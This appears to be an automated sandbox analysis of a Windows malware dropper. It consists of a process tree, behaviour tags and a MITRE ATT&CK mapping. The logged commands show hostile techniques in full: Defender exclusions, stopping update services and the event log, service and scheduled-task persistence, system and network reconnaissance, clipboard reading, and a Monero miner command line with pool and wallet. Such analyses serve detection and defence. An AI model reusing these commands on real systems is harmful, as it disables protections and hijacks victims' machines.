PID 60 wrote to memory of 3224	60	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe	axplont.exe
PID 3224 wrote to memory of 4688	3224	axplont.exe	buildjudit.exe
PID 3224 wrote to memory of 4688	3224	axplont.exe	buildjudit.exe
PID 2584 wrote to memory of 2232	2584	stub.exe	cmd.exe
PID 2584 wrote to memory of 2232	2584	stub.exe	cmd.exe
PID 2584 wrote to memory of 1348	2584	stub.exe	cmd.exe
PID 2584 wrote to memory of 1348	2584	stub.exe	cmd.exe
PID 2584 wrote to memory of 4912	2584	stub.exe	cmd.exe
PID 2584 wrote to memory of 4912	2584	stub.exe	cmd.exe
PID 1348 wrote to memory of 2352	1348	cmd.exe	WMIC.exe
PID 1348 wrote to memory of 2352	1348	cmd.exe	WMIC.exe
PID 4912 wrote to memory of 8	4912	cmd.exe	tasklist.exe
PID 4912 wrote to memory of 8	4912	cmd.exe	tasklist.exe
PID 2584 wrote to memory of 2580	2584	stub.exe	cmd.exe
PID 2584 wrote to memory of 2580	2584	stub.exe	cmd.exe
PID 3224 wrote to memory of 2256	3224	axplont.exe	33333.exe
PID 3224 wrote to memory of 2256	3224	axplont.exe	33333.exe
PID 3224 wrote to memory of 2256	3224	axplont.exe	33333.exe
PID 2580 wrote to memory of 1376	2580	cmd.exe	attrib.exe
PID 2580 wrote to memory of 1376	2580	cmd.exe	attrib.exe
PID 2584 wrote to memory of 3200	2584	stub.exe	cmd.exe
PID 2584 wrote to memory of 3200	2584	stub.exe	cmd.exe
PID 2256 wrote to memory of 1824	2256	33333.exe	RegAsm.exe
PID 2256 wrote to memory of 1824	2256	33333.exe	RegAsm.exe
PID 2256 wrote to memory of 1824	2256	33333.exe	RegAsm.exe
PID 2256 wrote to memory of 3528	2256	33333.exe	RegAsm.exe
PID 2256 wrote to memory of 3528	2256	33333.exe	RegAsm.exe
PID 2256 wrote to memory of 3528	2256	33333.exe	RegAsm.exe
PID 2256 wrote to memory of 404	2256	33333.exe	RegAsm.exe
PID 2256 wrote to memory of 404	2256	33333.exe	RegAsm.exe
PID 2256 wrote to memory of 404	2256	33333.exe	RegAsm.exe
PID 2584 wrote to memory of 1392	2584	stub.exe	cmd.exe
PID 2584 wrote to memory of 1392	2584	stub.exe	cmd.exe
PID 2256 wrote to memory of 404	2256	33333.exe	RegAsm.exe
PID 2256 wrote to memory of 404	2256	33333.exe	RegAsm.exe
PID 2256 wrote to memory of 404	2256	33333.exe	RegAsm.exe
PID 2256 wrote to memory of 404	2256	33333.exe	RegAsm.exe
PID 2256 wrote to memory of 404	2256	33333.exe	RegAsm.exe
PID 1392 wrote to memory of 3164	1392	cmd.exe	taskkill.exe
PID 1392 wrote to memory of 3164	1392	cmd.exe	taskkill.exe
PID 3224 wrote to memory of 4048	3224	axplont.exe	fileosn.exe
PID 3224 wrote to memory of 4048	3224	axplont.exe	fileosn.exe
PID 3224 wrote to memory of 4048	3224	axplont.exe	fileosn.exe
PID 2584 wrote to memory of 4636	2584	stub.exe	cmd.exe
PID 2584 wrote to memory of 4636	2584	stub.exe	cmd.exe
PID 2584 wrote to memory of 2512	2584	stub.exe	sihclient.exe
PID 2584 wrote to memory of 2512	2584	stub.exe	sihclient.exe
PID 2584 wrote to memory of 3548	2584	stub.exe	cmd.exe
PID 2584 wrote to memory of 3548	2584	stub.exe	cmd.exe
PID 2584 wrote to memory of 4980	2584	stub.exe	cmd.exe
PID 2584 wrote to memory of 4980	2584	stub.exe	cmd.exe
PID 404 wrote to memory of 2400	404	RegAsm.exe	svhoost.exe
PID 404 wrote to memory of 2400	404	RegAsm.exe	svhoost.exe
PID 404 wrote to memory of 2400	404	RegAsm.exe	svhoost.exe
PID 404 wrote to memory of 2208	404	RegAsm.exe	One.exe
PID 404 wrote to memory of 2208	404	RegAsm.exe	One.exe
PID 2512 wrote to memory of 1540	2512	cmd.exe	powershell.exe
PID 2512 wrote to memory of 1540	2512	cmd.exe	powershell.exe
PID 3224 wrote to memory of 2440	3224	axplont.exe	lumma1234.exe
PID 3224 wrote to memory of 2440	3224	axplont.exe	lumma1234.exe
PID 3224 wrote to memory of 2440	3224	axplont.exe	lumma1234.exe
PID 3548 wrote to memory of 1836	3548	cmd.exe	chcp.com

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

1376 attrib.exe

pid	process
1376	attrib.exe

C:\Users\Admin\AppData\Local\Temp\e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
"C:\Users\Admin\AppData\Local\Temp\e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:60

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3224

C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe
"C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"
3⤵
- Executes dropped EXE
PID:4688

C:\Users\Admin\AppData\Local\Temp\onefile_4688_133611402475713356\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:2584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
5⤵
PID:2232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
5⤵
- Suspicious use of WriteProcessMemory
PID:1348

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
5⤵
- Suspicious use of WriteProcessMemory
PID:4912

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:8

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
5⤵
- Suspicious use of WriteProcessMemory
PID:2580

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
6⤵
- Views/modifies file attributes
PID:1376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
5⤵
PID:3200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:1392

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:4636

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
5⤵
- Suspicious use of WriteProcessMemory
PID:2512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
5⤵
- Suspicious use of WriteProcessMemory
PID:3548

C:\Windows\system32\chcp.com
chcp
6⤵
PID:1836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
5⤵
PID:4980

C:\Windows\system32\chcp.com
chcp
6⤵
PID:4352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
5⤵
PID:2636

C:\Windows\system32\systeminfo.exe
systeminfo
6⤵
- Gathers system information
PID:4812

C:\Windows\system32\HOSTNAME.EXE
hostname
6⤵
PID:5564

C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
6⤵
- Collects information from the system
- Suspicious use of AdjustPrivilegeToken
PID:5580

C:\Windows\system32\net.exe
net user
6⤵
PID:5612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
7⤵
PID:5628

C:\Windows\system32\query.exe
query user
6⤵
PID:5644

C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
7⤵
PID:5660

C:\Windows\system32\net.exe
net localgroup
6⤵
PID:5676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
7⤵
PID:5688

C:\Windows\system32\net.exe
net localgroup administrators
6⤵
PID:5708

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
7⤵
PID:5720

C:\Windows\system32\net.exe
net user guest
6⤵
PID:5736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
7⤵
PID:5748

C:\Windows\system32\net.exe
net user administrator
6⤵
PID:5768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
7⤵
PID:5780

C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
6⤵
PID:5800

C:\Windows\system32\tasklist.exe
tasklist /svc
6⤵
- Enumerates processes with tasklist
PID:5832

C:\Windows\system32\ipconfig.exe
ipconfig /all
6⤵
- Gathers network information
PID:5944

C:\Windows\system32\ROUTE.EXE
route print
6⤵
PID:6052

C:\Windows\system32\ARP.EXE
arp -a
6⤵
PID:6112

C:\Windows\system32\NETSTAT.EXE
netstat -ano
6⤵
- Gathers network information
PID:6128

C:\Windows\system32\sc.exe
sc query type= service state= all
6⤵
- Launches sc.exe
PID:5132

C:\Windows\system32\netsh.exe
netsh firewall show state
6⤵
- Modifies Windows Firewall
PID:4832

C:\Windows\system32\netsh.exe
netsh firewall show config
6⤵
- Modifies Windows Firewall
PID:5228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
5⤵
PID:2460

C:\Windows\system32\netsh.exe
netsh wlan show profiles
6⤵
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
5⤵
PID:660

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
6⤵
PID:1856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
5⤵
PID:5604

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
6⤵
PID:5628

C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:1824

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:3528

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:404

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2400

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2208

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
5⤵
PID:5880

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
6⤵
PID:5844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 300
4⤵
- Program crash
PID:4232

C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:4048

C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2440

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:4016

C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:5088

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe" /F
4⤵
- Creates scheduled task(s)
PID:836

C:\Users\Admin\AppData\Local\Temp\1000284001\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\1000284001\toolspub1.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:2160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 352
5⤵
- Program crash
PID:3528

C:\Users\Admin\AppData\Local\Temp\1000285001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000285001\FirstZ.exe"
4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1376

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:5464

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:4812

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
5⤵
- Launches sc.exe
PID:1920

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:5596

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
5⤵
- Launches sc.exe
PID:5656

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
5⤵
- Launches sc.exe
PID:5688

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
5⤵
- Launches sc.exe
PID:5512

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
5⤵
PID:6004

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
5⤵
PID:5996

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
5⤵
PID:5992

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
5⤵
PID:5752

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
5⤵
- Launches sc.exe
PID:5788

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
5⤵
- Launches sc.exe
PID:1208

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
5⤵
- Launches sc.exe
PID:3288

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
5⤵
- Launches sc.exe
PID:2544

C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4168

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:4712

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:1376

C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4088

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4932

C:\Users\Admin\AppData\Local\Temp\1000010001\install.exe
"C:\Users\Admin\AppData\Local\Temp\1000010001\install.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
PID:2212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
4⤵
PID:2108

C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClient
5⤵
- Launches sc.exe
PID:5168

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClient confirm
5⤵
- Executes dropped EXE
PID:5184

C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLink
5⤵
- Launches sc.exe
PID:5212

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLink confirm
5⤵
- Executes dropped EXE
PID:5228

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
5⤵
- Executes dropped EXE
PID:5248

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLink
5⤵
- Executes dropped EXE
PID:5276

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
4⤵
PID:5992

C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClientC
5⤵
- Launches sc.exe
PID:6072

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClientC confirm
5⤵
- Executes dropped EXE
PID:6084

C:\Windows\SysWOW64\sc.exe
Sc delete PiercingNetLink
5⤵
- Launches sc.exe
PID:5176

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove PiercingNetLink confirm
5⤵
- Executes dropped EXE
PID:5224

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
5⤵
- Executes dropped EXE
PID:5252

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start PiercingNetLink
5⤵
- Executes dropped EXE
PID:1228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
4⤵
PID:5760

C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLinks
5⤵
- Launches sc.exe
PID:5768

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLinks confirm
5⤵
- Executes dropped EXE
PID:5808

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
5⤵
- Executes dropped EXE
PID:5872

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLinks
5⤵
- Executes dropped EXE
PID:5292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
4⤵
PID:4596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2256 -ip 2256
1⤵
PID:4924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 2160 -ip 2160
1⤵
PID:2512

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4352

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:2016

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv mHvJlgRXVUysScnf/7K0kA.0.2
1⤵
PID:2512

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4016

C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
1⤵
- Executes dropped EXE
PID:3492

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:5296

C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
2⤵
- Executes dropped EXE
PID:5408

C:\Windows\Temp\698247.exe
"C:\Windows\Temp\698247.exe" --list-devices
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5496

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:2772

C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
2⤵
- Executes dropped EXE
PID:3912

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:5832

C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5980

C:\Windows\Temp\506308.exe
"C:\Windows\Temp\506308.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:5012

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5872

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:3988

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:4980

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
2⤵
- Launches sc.exe
PID:5776

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:5844

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
2⤵
- Launches sc.exe
PID:4512

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
2⤵
- Launches sc.exe
PID:3936

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
2⤵
- Launches sc.exe
PID:2044

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:6120

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:3856

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:6128

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:5564

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:5568

C:\Windows\explorer.exe
explorer.exe
2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1028

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:656

C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
1⤵
- Executes dropped EXE
PID:4812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion